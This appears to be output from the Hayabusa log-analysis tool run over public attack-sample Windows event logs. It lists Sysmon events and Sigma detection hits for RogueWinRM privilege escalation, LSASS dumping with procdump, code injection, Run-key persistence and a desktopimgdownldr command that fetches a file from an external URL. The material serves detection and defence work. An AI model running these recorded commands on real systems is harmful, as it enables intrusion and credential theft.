+2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
+2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
+2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
